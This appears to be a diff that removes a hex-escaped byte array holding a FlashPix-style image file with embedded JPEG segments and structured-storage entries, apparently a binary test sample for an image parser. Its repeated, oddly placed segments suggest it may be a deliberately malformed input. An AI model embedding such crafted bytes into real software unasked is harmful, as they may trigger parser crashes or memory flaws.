-"\x99\xea\xb5\xab\x8c\x5e\xa8\xff\xd8\xff\xc0\x00\x11\x08\x00\x40"
-"\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c"
-"\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x29\xe3\x96\x4c\x79"
-"\x53\x79\x78\xeb\xc6\x73\x4b\x6f\x95\x22\x37\x97\xcc\x70\x79\x38"
-"\xc5\x24\xf2\x95\xf9\x63\x1b\x9c\xf1\x8f\x4a\xb3\x6d\x00\x85\x37"
-"\xc8\x72\xdd\x49\x34\xac\x36\xcc\x5d\x6e\xca\xf2\x5b\xe6\x78\x03"
-"\x05\x38\xf9\x80\xce\x78\xa8\x74\xeb\x1b\xc4\xbb\x89\xa4\x56\x70"
-"\x18\x1e\x46\x00\xad\xeb\xac\xcb\xb2\x2e\x86\x43\x80\x3d\x07\x73"
-"\x44\x4a\x61\xb8\x92\x14\xe3\xf8\xd0\x1e\x84\x77\x15\xca\xf0\x30"
-"\x73\xf6\x97\xd6\xf7\x35\x58\x99\x28\xf2\x5b\x42\x29\x3c\xcf\x98"
-"\x2a\xe0\x83\xeb\x50\xbd\xc4\xb1\x00\x64\x44\x50\x7f\xda\xad\x17"
-"\x45\x97\x24\x70\xc2\xa8\x5f\x43\x70\xc1\x7e\xce\xeb\x1c\x8a\x7a"
-"\xb0\xcd\x74\xf2\xdd\xee\x67\xcd\x65\xb0\xc4\xb9\x76\x50\x76\xc6"
-"\x32\x3f\xbf\x52\x48\xc5\xad\x09\x38\xc9\x1c\xe0\xd3\x22\xb4\xdb"
-"\x10\x0e\xff\x00\x36\x39\xc0\x14\xb2\xc7\xe5\xdb\xb0\xdc\x48\xc7"
-"\x7a\x94\x9a\x65\xc9\xa7\x12\xdd\x9d\xa8\x89\x77\xbf\xcc\xe7\xa9"
-"\x3d\x6a\x71\xfb\xc6\xcf\xf0\x8f\xd6\x95\xb2\xe7\x6e\x08\x5e\xfe"
-"\xf4\xd9\xf7\xf9\x0c\x21\xfb\xe4\x60\x7b\x56\xa6\x24\x76\xff\x00"
-"\xbd\xb8\x92\x73\xf7\x47\xc8\x9f\x41\xd7\xf5\xa2\xf7\xf7\x6a\xb7"
-"\x1d\x3c\x93\x96\xff\x00\x77\xbd\x4d\x0c\x62\x28\x96\x35\xe8\xa3"
-"\x14\xe2\x01\x18\x3c\x8a\x2f\xa8\xad\xa0\xd6\x5c\x9d\xca\x70\x7d"
-"\x7d\x69\x08\x12\xae\x18\x61\x87\x5f\x6a\x65\xa4\x6d\x0c\x02\x23"
-"\xd1\x0e\xd5\xe7\xf8\x7b\x54\xae\xbb\xb9\x07\x0c\x3a\x1a\x06\x55"
-"\x74\x28\x70\x7f\x3a\x86\xe7\xfd\x43\x55\xfc\x6f\x52\x1d\x71\x54"
-"\x6e\xd7\x6c\x72\x0f\x4a\x9b\x15\x72\xc0\x9b\x03\x1b\x4f\xe2\x73"
-"\x55\x0d\xa5\xb9\x39\xdb\x20\xe3\x1c\x48\x6a\xe7\xd9\x57\xfb\xef"
-"\xf9\xd1\xf6\x45\xfe\xfb\xfe\x74\x08\x86\xdc\x25\xbe\x76\x06\x39"
-"\x18\xf9\x98\x9a\x92\x49\x44\x8b\xb5\x94\xe3\x39\xe0\xd3\xbe\xca"
-"\xbf\xdf\x7f\xce\x8f\xb2\xaf\xf7\xdf\xf3\xa0\x0a\x62\xd2\x01\x9c"
-"\x09\x06\x4e\x4f\xef\x0f\x26\xae\x09\xc8\x00\x6d\xfd\x68\xfb\x22"
-"\xff\x00\x7d\xff\x00\x3a\x3e\xca\xbf\xdf\x7f\xce\x80\x10\x4e\x41"
-"\x27\x69\xe7\xde\xab\x5d\x9d\xd1\x39\xc7\x5a\xb5\xf6\x45\xfe\xfb"
-"\xfe\x74\x8d\x66\x8c\xa4\x17\x7c\x1f\x7a\x00\xb3\x45\x14\x53\x00"
-"\xa2\x8a\x28\x00\xa2\x8a\x28\x00\xa2\x8a\x28\x00\xff\xd9\x03\x11"
-"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5"
-"\x5a\x6b\xae\xe4\x2b\xb8\xae\x7b\x8e\xa2\xa3\x92\x29\x1d\xb2\xb3"
-"\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05"
-"\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06"
-"\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1"
-"\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25"
-"\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36\x37\x38\x39\x3a"
-"\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a"
-"\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a"
-"\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98"
-"\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6"
-"\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4"
-"\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2"
-"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x21\x31\x41\x00\x00\x00"
-"\x32\x02\x00\x00\xff\xd8\xff\xdb\x00\x43\x00\x0c\x08\x09\x0a\x09"
-"\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c\x0e\x12\x1e\x13\x12\x10\x10\x12"
-"\x25\x1a\x1c\x16\x1e\x2c\x26\x2e\x2d\x2b\x26\x2a\x29\x30\x36\x45"
-"\x3b\x30\x33\x42\x34\x29\x2a\x3c\x52\x3d\x42\x48\x4a\x4e\x4f\x4e"
-"\x2f\x3a\x55\x5b\x55\x4c\x5b\x45\x4c\x4e\x4b\xff\xdb\x00\x43\x01"
-"\x0c\x0d\x0d\x12\x0f\x12\x23\x13\x13\x23\x4b\x32\x2a\x32\x4b\x4b"
-"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\xff\xc4\x01\xa2\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a"
-"\x0b\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00"
-"\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51"
-"\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23\x42\xb1\xc1\x15\x52"
-"\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17\x18\x19\x1a\x25\x26"
-"\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47"
-"\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67"
-"\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x83\x84\x85\x86\x87"
-"\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5"
-"\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3"
-"\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda"
-"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6"
-"\xf7\xf8\xf9\xfa\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01"
-"\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a"
-"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00"
-"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x29\x09\x03"
-"\xa9\xa8\xde\x65\x53\x81\x92\x7d\x05\x00\x3a\x54\x57\x8c\x87\xce"
-"\x3d\x8e\x2a\xa6\xeb\x4e\x7f\x79\x27\xfd\xf4\xd5\x2c\x8f\x29\xc0"
-"\xfb\x99\xe8\xa3\x92\x6a\x3f\xb3\x20\x65\x12\x39\x25\xb3\x92\x1b"
-"\xa5\x3b\x13\x71\xf0\x2d\xbc\x8f\xbe\x22\xc4\xaf\xa9\x3f\xd6\xad"
-"\x55\x30\xb3\x5b\xf4\x7d\xe9\xea\xdc\xfe\x75\x2a\xcf\xd3\x78\xdb"
-"\x9e\xfd\xa8\xb0\xee\x4f\x45\x34\x30\x3d\xe9\xd4\x86\x34\xae\x41"
-"\xe7\x9f\x5a\x6c\x51\x08\x54\xfc\xc4\xe4\xe4\x93\x4d\x79\xf0\x48"
-"\x51\xc8\xaa\xf2\xcc\x7f\x8d\xb1\xf5\xe0\x52\xb8\x58\x95\x9d\x23"
-"\x94\xc9\xbc\xb6\x46\x31\xd8\x56\x45\xf2\xc9\x3d\xca\xcb\x1b\x3a"
-"\xaf\xb1\xc5\x5c\x5f\xdf\x9c\xe7\xe4\x1e\x9d\xe9\xdb\x03\x48\xc0"
-"\xaf\xcb\xb7\x18\xa5\x28\xc6\x6a\xd2\x1a\x6d\x6a\x84\x37\x8e\x81"
-"\x02\x65\x81\x38\x23\x6f\x4a\xb5\x6c\x41\x0e\x0e\x70\x4f\xdd\x3d"
-"\x05\x53\x54\x27\x23\x24\x3a\xf1\x93\xdc\x7b\xd3\x92\x5f\x9b\x61"
-"\x20\x38\x38\xda\x4d\x37\xa0\x6e\x5f\x8e\x30\x8a\x57\x39\x19\xc8"
-"\xcf\x6a\x78\x18\xaa\x27\x2d\x82\x4b\x02\x3a\x73\x4f\x8e\x57\x8c"
-"\xe5\xe4\xca\x8e\xb9\x14\xc5\xa9\x05\xc7\x9c\x25\x72\x99\xc7\x34"
-"\xc3\x68\x6e\xec\x40\x98\xba\x1f\xbd\x8e\xf5\x6f\x6e\xe9\x88\xf7"
-"\xa9\x88\x1e\x5b\x7b\x8e\x05\x43\x82\x92\x6a\x45\x73\xb5\x6b\x19"
-"\xf0\x5a\x8b\x2b\x60\x50\x96\x52\x72\xd9\xed\x53\x28\x19\x2c\x33"
-"\xcf\xbd\x5a\x51\x98\x97\x23\x38\x18\x22\xaa\xb4\x0e\x24\xf2\x95"
-"\xb0\xa4\xf0\x7b\x81\x4d\x41\x45\x5a\x22\xe6\x6d\xdd\x8d\x8d\x37"
-"\xdc\x7c\x99\xe3\xef\x12\x78\x15\x5a\x4d\x32\x26\xd4\x0c\xdb\xe4"
-"\xc1\x7c\x9e\x78\xcf\x5a\xd3\x54\x58\xa3\xda\xa3\xe5\x5f\xd6\x94"
-"\x47\x9b\x72\x0f\xde\x3c\xe7\xde\x89\x53\x84\xfe\x25\x70\x53\x94"
-"\x76\x65\x4b\xa8\xe4\x8d\x0b\xc6\x58\xfa\x01\xde\xa1\x1e\x77\x94"
-"\xc6\x4c\xf2\xbe\xb5\xa4\xbf\x3a\x03\x8e\x48\xe4\x55\x7b\xa8\xf6"
-"\xc4\xc4\x74\x20\xd0\xd0\xd4\x87\xed\x90\xc8\xc5\x07\x7f\x5a\x47"
-"\x86\x49\x08\x2e\x80\x91\xef\x53\xc7\xd4\xd4\x95\x44\x95\x12\x19"
-"\x23\x24\xa2\x05\xcf\x5e\x69\x76\x4d\xbb\x76\x06\x47\xbd\x5a\xa2"
-"\x80\x2a\x3c\x32\x48\x00\x74\x0d\x8e\x99\x34\xa2\x39\x55\x36\x05"
-"\x01\x7d\x33\x56\xa8\xa0\x0a\x91\xc3\x24\x79\xd8\x81\x73\xe8\x68"
-"\x96\x29\xe4\x8c\xa9\x03\x91\xeb\x56\xe8\xa0\x00\xff\xd9\x05\xc9"
-"\x27\x70\x42\x80\x76\xeb\x9a\xa8\xbb\x32\x64\xae\xac\x4b\x45\x14"
-"\x54\x94\x00\xff\xd9\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08"
-"\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04"
-"\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04"
-"\x05\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14"
-"\x42\x91\xa1\xb1\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16"
-"\x24\x34\xe1\x25\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36"
-"\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56"
-"\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76"
-"\x77\x78\x79\x7a\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94"
-"\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2"
-"\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9"
-"\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7"
-"\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x21\x31"
-"\x41\x00\x00\x00\x32\x02\x00\x00\xff\xd8\xff\xdb\x00\x43\x00\x0c"
-"\x08\x09\x0a\x09\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c\x0e\x12\x1e\x13"
-"\x12\x10\x10\x12\x25\x1a\x1c\x16\x1e\x2c\x26\x2e\x2d\x2b\x26\x2a"
-"\x29\x30\x36\x45\x3b\x30\x33\x42\x34\x29\x2a\x3c\x52\x3d\x42\x48"
-"\x4a\x4e\x4f\x4e\x2f\x3a\x55\x5b\x55\x4c\x5b\x45\x4c\x4e\x4b\xff"
-"\xdb\x00\x43\x01\x0c\x0d\x0d\x12\x0f\x12\x23\x13\x13\x23\x4b\x32"
-"\x2a\x32\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\x4b\x4b\x4b\x4b\xff\xc4\x01\xa2\x00\x00\x01\x05\x01\x01\x01\x01"
-"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06"
-"\x07\x08\x09\x0a\x0b\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05"
-"\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31"
-"\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23\x42"
-"\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17\x18"
-"\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a\x43"
-"\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63"
-"\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x83"
-"\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a"
-"\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8"
-"\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6"
-"\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2"
-"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\x01\x00\x03\x01\x01\x01\x01\x01"
-"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06"
-"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00"
-"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\xab\x75\x6d\x34\xcf\xba\x3b\x97\x88\x63\x1b"
-"\x57\xbd\x5a\xa6\xc8\xdb\x10\xb6\x0b\x60\x74\x1d\xe8\x02\x99\xb3"
-"\xba\x3f\xf2\xfc\xe3\xf0\x14\x7d\x92\xe8\x9f\xf8\xfe\x71\xc7\x65"
-"\x1d\x7d\x69\x0e\xa5\xc9\x02\xda\x52\x41\xc6\x31\xd6\x94\x6a\x1b"
-"\x90\xb0\xb6\x94\x10\xe1\x70\x46\x09\xfa\x50\x05\xea\x28\xa6\x97"
-"\x50\x76\xe7\x9f\x41\x40\x0e\xa2\xa1\x96\x61\x1c\x65\xdc\xac\x68"
-"\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05"
-"\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06"
-"\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1"
-"\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25"
-"\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36\x37\x38\x39\x3a"
-"\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a"
-"\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a"
-"\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98"
-"\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6"
-"\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4"
-"\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2"
-"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x01\x02\x13\x00\x00\x00"
-"\x04\x00\x00\x00\x41\x00\x00\x00\x32\x02\x00\x00\xff\xd8\xff\xdb"
-"\x00\x43\x00\x0c\x08\x09\x0a\x09\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c"
-"\x0e\x12\x1e\x13\x12\x10\x10\x12\x25\x1a\x1c\x16\x1e\x2c\x26\x2e"
-"\x2d\x2b\x26\x2a\x29\x30\x36\x45\x3b\x30\x33\x42\x34\x29\x2a\x3c"
-"\x52\x3d\x42\x48\x4a\x4e\x4f\x4e\x2f\x3a\x55\x5b\x55\x4c\x5b\x45"
-"\x4c\x4e\x4b\xff\xdb\x00\x43\x01\x0c\x0d\x0d\x12\x0f\x12\x23\x13"
-"\x13\x23\x4b\x32\x2a\x32\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
-"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\xff\xc4\x01\xa2\x00\x00\x01\x05"
-"\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02"
-"\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x10\x00\x02\x01\x03\x03\x02"
-"\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11"
-"\x05\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91"
-"\xa1\x08\x23\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09"
-"\x0a\x16\x17\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37"
-"\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57"
-"\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77"
-"\x78\x79\x7a\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96"
-"\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4"
-"\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2"
-"\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8"
-"\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\x01\x00\x03\x01"
-"\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02"
-"\x00\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\x13\x10\x00\x00"
-"\x00\x00\x00\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x48\x00\x00\x00\xed\x3f\x91\x1d\x10\xf8\xc7\x4c\xba\x77\x18\xb2"
-"\x0a\xef\x0a\x49\x48\x00\x00\x00\x00\x6a\x61\x56\x54\xc1\xce\x11"
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x13\x10\x00\x00\x01\x00\x00\x00"
-"\x01\x00\x00\x00\x13\x10\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00"
-"\x13\x00\x00\x00\x01\x00\x00\x00\x04\x10\x00\x00\x04\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\xb5\xbf\x94\x3f\x00\x00\x80\x3f"
-"\x04\x00\x00\x00\xb5\xbf\x94\x3f\x3b\x5f\xdc\xa2\x27\x52\xc1\xb6"
-"\x00\x3e\xb9\xaa\xfe\x76\xa5\x79\xc4\x11\x0b\x38\x8f\xf1\xcd\xcb"
-"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x6e\x61\x56\x54\xc1\xce\x11"
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x6e\x61\x56"
-"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00"
-"\x34\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00"
-"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11"
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00"
-"\x80\x00\x00\x00\x6e\x00\x00\x00\x04\x00\x00\x00\x40\x00\x00\x00"
-"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00"
-"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11"
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00"
-"\x3f\x89\xce\x2a\x13\x24\xb3\x71\x14\x65\x81\xfe\x29\x06\x17\xf2"
-"\xea\x69\xd8\x4d\x96\x5a\x45\x5e\xa6\xab\x9b\xc2\xe7\x6d\xbc\x66"
-"\x43\xed\xd0\x7d\x4f\x4a\x55\xb3\x0d\x83\x70\xfe\x6e\x3f\x84\x0d"
-"\xaa\x3f\x0a\x68\x63\x72\x36\x5b\xfc\x90\x77\x91\x7f\x8b\xd9\x7f"
-"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00"
-"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x31\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x20\x00\x01\x01\x13\x00\x00\x00\x0d\x00\x00\x00\x11\x00\x00\x00"
-"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
-"\x00\x00\x00\x00\xe0\x40\xaf\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b"
-"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
-"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00"
-"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x2a\x00\x02\x01\x12\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x65\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00"
-"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
-"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00"
-"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x66\x00\x00\x00\x9e\x08\x00\x00\x00\x00\x00\x00"
-"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00"
-"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x20\x00\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\x14\x00\x00\x00"
-"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
-"\x00\x00\x00\x00\x20\x4e\xb2\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b"
-"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11"
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00"
-"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00"
-"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00"
